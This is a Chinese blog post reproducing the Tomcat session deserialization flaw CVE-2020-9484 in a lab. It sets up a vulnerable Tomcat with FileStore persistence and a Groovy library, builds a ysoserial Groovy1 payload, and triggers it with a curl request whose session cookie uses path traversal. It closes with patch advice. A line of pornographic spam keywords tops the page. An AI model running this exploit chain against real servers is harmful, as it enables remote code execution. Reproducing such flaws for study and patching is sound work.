国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一、漏洞介紹

????????北京時(shí)間2020年05月20日,Apache官方發(fā)布了 Apache Tomcat 遠(yuǎn)程代碼執(zhí)行 的風(fēng)險(xiǎn)通告,該漏洞編號(hào)為 CVE-2020-9484。

Apache Tomcat 是一個(gè)開(kāi)放源代碼、運(yùn)行servlet和JSP Web應(yīng)用軟件的基于Java的Web應(yīng)用軟件容器。當(dāng)Tomcat使用了自帶session同步功能時(shí),使用不安全的配置(沒(méi)有使用EncryptInterceptor)會(huì)存在反序列化漏洞,攻擊者通過(guò)精心構(gòu)造的數(shù)據(jù)包, 可以對(duì)使用了自帶session同步功能的Tomcat服務(wù)器進(jìn)行攻擊。

二、影響版本

Apache Tomcat: 10.0.0-M1 to 10.0.0-M4

Apache Tomcat: 9.0.0.M1 to 9.0.34

Apache Tomcat: 8.5.0 to 8.5.54

Apache Tomcat: 7.0.0 to 7.0.103

三、漏洞復(fù)現(xiàn)

1、環(huán)境搭建

需要環(huán)境:虛擬機(jī)、centos 7 系統(tǒng)

安裝tomcat需要jdk1.8,安裝教程可以去Kali-JDK1-8安裝 - 簡(jiǎn)書(shū)??????

下載安裝tomcat,

wget https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/tomcat-10.0.0-M4.tar.gz

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?然后呢,創(chuàng)建一個(gè)文件夾用來(lái)把tomcat目錄,將tomcat解壓進(jìn)去

mkdir /usr/local/tomcat
tar -zxvf tomcat-10.0.0-M4.tar.gz -C /usr/local/tomcat/

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?修改/usr/local/tomcat/apache-tomcat-10.0.0-M4/conf
/context.xlm 添加Manager? ? 保存退出

<Manager className="org.apache.catalina.session.PersistentManager">
            <Store className="org.apache.catalina.session.FileStore" directory="/tomcat/sessions/"/>
    </Manager>

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?下載groovy-2.3.9.jar,然后將groovy-2.3.9.jar 放入/usr/local/tomcat/apache-tomcat-10.0.0-M4/lib
目錄下?

在lib下執(zhí)行:

wget https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?

運(yùn)行tomcat:在usr/local/tomcat/apache-tomcat-10.0.0-M4/bin目錄下運(yùn)行catalina.sh start

/usr/local/tomcat/apache-tomcat-10.0.0-M4/bin/catalina.sh start

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?訪問(wèn)http://127.0.0.1:8080端口,顯示如下界面,說(shuō)明安裝成功

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?2、漏洞復(fù)現(xiàn)

下載ysoserial 一個(gè)生成java反序列化 payload 的 .jar 包

下載地址: https://github.com/frohoff/ysoserial.git

用瀏覽器下載,解壓,并生成一個(gè)jar包,復(fù)制進(jìn)linux系統(tǒng)

生成jar包的方式,進(jìn)入文件夾的目錄輸入 輸入命令: mvn package

編譯有點(diǎn)慢需要幾分鐘世間

編譯完成后在target目錄下,有jar包

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)?

執(zhí)行下面語(yǔ)句生成 payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?使用以下命令訪問(wèn)tomcat服務(wù)

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?雖然顯示報(bào)錯(cuò),但是也執(zhí)行了。在/tmp目錄下創(chuàng)建了2333目錄

Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

?修改建議

?

通用修補(bǔ)建議:

  • 升級(jí)到 Apache Tomcat 10.0.0-M5 及以上版本
  • 升級(jí)到 Apache Tomcat 9.0.35 及以上版本
  • 升級(jí)到 Apache Tomcat 8.5.55 及以上版本
  • 升級(jí)到 Apache Tomcat 7.0.104 及以上版本

臨時(shí)修補(bǔ)建議:

禁止使用Session持久化功能FileStore。

參考鏈接:

https://github.com/masahiro331/CVE-2020-9484

https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg

https://github.com/threedr3am/tomcat-cluster-session-sync-exp文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-429529.html

到了這里,關(guān)于Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Kafka反序列化RCE漏洞(CVE-2023-34040)

    Spring Kafka 是 Spring Framework 生態(tài)系統(tǒng)中的一個(gè)模塊,用于簡(jiǎn)化在 Spring 應(yīng)用程序中集成 Apache Kafka 的過(guò)程,記錄 (record) 指 Kafka 消息中的一條記錄。 受影響版本中默認(rèn)未對(duì)記錄配置? ErrorHandlingDeserializer ,當(dāng)用戶將容器屬性? checkDeserExWhenKeyNull ?或? checkDeserExWhenValueNull ?設(shè)置為

    2024年02月06日
    瀏覽(32)
  • Jboss(CVE-2017-12149)反序列化命令執(zhí)行漏洞

    Jboss(CVE-2017-12149)反序列化命令執(zhí)行漏洞

    該漏洞為 Java反序列化錯(cuò)誤類型,存在于 Jboss 的 HttpInvoker 組件中的 ReadOnlyAccessFilter 過(guò)濾器中。該過(guò)濾器在沒(méi)有進(jìn)行任何安全檢查的情況下嘗試將來(lái)自客戶端的數(shù)據(jù)流進(jìn)行反序列化,從而導(dǎo)致了漏洞。 受影響系統(tǒng)及應(yīng)用版本?? ?Jboss AS 5.x、Jboss AS 6.x 環(huán)境搭建 使用vulhub靶場(chǎng)

    2024年02月15日
    瀏覽(33)
  • 【中?!縎pring Kafka 反序列化漏洞 (CVE-2023-34040)

    【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)

    zhi.oscs1024.com????? 漏洞類型 反序列化 發(fā)現(xiàn)時(shí)間 2023-08-24 漏洞等級(jí) 中危 MPS編號(hào) MPS-fed8-ocuv CVE編號(hào) CVE-2023-34040 漏洞影響廣度 小 OSCS 描述 Spring Kafka?是 Spring Framework 生態(tài)系統(tǒng)中的一個(gè)模塊,用于簡(jiǎn)化在 Spring 應(yīng)用程序中集成 Apache Kafka 的過(guò)程,記錄(record)指 Kafka 消息中的一

    2024年02月11日
    瀏覽(54)
  • WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    Oracle官方發(fā)布了2021年7月份安全更新通告,通告中披露了WebLogic組件存在高危漏洞,攻擊者可以在未授權(quán)的情況下通過(guò)IIOP、T3協(xié)議對(duì)存在漏洞的WebLogic Server組件進(jìn)行攻擊。成功利用該漏洞的攻擊者可以接管WebLogic Server。 這是一個(gè)二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    瀏覽(37)
  • Jboss反序列化遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-12149)

    Jboss反序列化遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-12149)

    :Jboss文件下的httplnvoker組件中的Readonly Accessfilter過(guò)濾器中的dofilter沒(méi)有限制來(lái)自客戶端的序列化數(shù)據(jù)而進(jìn)行反序列化。 漏洞影響版本:Jboss5.x Jboss6.x 利用vulhub搭建Jboss cd vulhub cd jboss cd CVE-2017-12149 docker-compose build (若出現(xiàn)鏡像問(wèn)題,直接執(zhí)行下面命令) docker-compose up -d 訪問(wèn):h

    2024年02月07日
    瀏覽(33)
  • Jackson-databind 反序列化漏洞(CVE-2017-7525、CVE-2017-17485)

    Jackson-databind 反序列化漏洞(CVE-2017-7525、CVE-2017-17485)

    Jackson-databind 支持 Polymorphic Deserialization 特性(默認(rèn)情況下不開(kāi)啟),當(dāng) json 字符串轉(zhuǎn)換的 Target class 中有 polymorph fields,即字段類型為接口、抽象類或 Object 類型時(shí),攻擊者可以通過(guò)在 json 字符串中指定變量的具體類型 (子類或接口實(shí)現(xiàn)類),來(lái)實(shí)現(xiàn)實(shí)例化指定的類,借助某些特

    2024年02月13日
    瀏覽(20)
  • Shiro反序列化漏洞(CVE-2016-4437)+docker靶場(chǎng)+工具利用

    Shiro反序列化漏洞(CVE-2016-4437)+docker靶場(chǎng)+工具利用

    將java對(duì)象轉(zhuǎn)換為字節(jié)序列(json/xml)的過(guò)程叫序列化,將字節(jié)序列(json/xml)恢復(fù)為java對(duì)象的過(guò)程稱為反序列化。 Shiro框架提供了“記住我”的功能,用戶登陸成功后會(huì)生成經(jīng)過(guò)加密并編碼的cookie,cookie的key為RememberMe,cookie的值是經(jīng)過(guò)序列化的,使用AES加密,再使用base64編碼

    2024年02月16日
    瀏覽(19)
  • Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

    Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

    目錄 前言: (一)基本介紹 0x01 影響版本 0x02?漏洞分析 根據(jù)加密的順序,不難知道解密的順序?yàn)椋?登入 ?驗(yàn)證 ?(二)環(huán)境搭建 1、本地復(fù)現(xiàn) 0x01 源代碼 0x02? pom.xml修改: 0x03 tomcat服務(wù)器 0x04??ysoserial-jar依賴 0x05? 訪問(wèn)端口 ?2、vulhub ?訪問(wèn)端口: ?(三)利用工具和方式 1、

    2024年02月05日
    瀏覽(29)
  • 【高?!緼pache Airflow Spark Provider 反序列化漏洞 (CVE-2023-40195)

    【高危】Apache Airflow Spark Provider 反序列化漏洞 (CVE-2023-40195)

    zhi.oscs1024.com????? 漏洞類型 反序列化 發(fā)現(xiàn)時(shí)間 2023-08-29 漏洞等級(jí) 高危 MPS編號(hào) MPS-qkdx-17bc CVE編號(hào) CVE-2023-40195 漏洞影響廣度 廣 OSCS 描述 Apache Airflow Spark Provider是Apache Airflow項(xiàng)目的一個(gè)插件,用于在Airflow中管理和調(diào)度Apache Spark作業(yè)。 受影響版本中,由于沒(méi)有對(duì)conn_prefix參

    2024年02月10日
    瀏覽(29)
  • Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    背景:公司項(xiàng)目掃描到 Spring-Kafka上使用通配符模式匹配進(jìn)行的安全繞過(guò)漏洞 CVE-2023-20873 中等風(fēng)險(xiǎn) | 2023年8月23日 | CVE-2023-34040 在Spring for Apache Kafka 3.0.9及更早版本以及2.9.10及更早版本中,存在可能的反序列化攻擊向量,但只有在應(yīng)用了不常見(jiàn)的配置時(shí)才會(huì)出現(xiàn)。攻擊者必須在

    2024年02月07日
    瀏覽(45)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包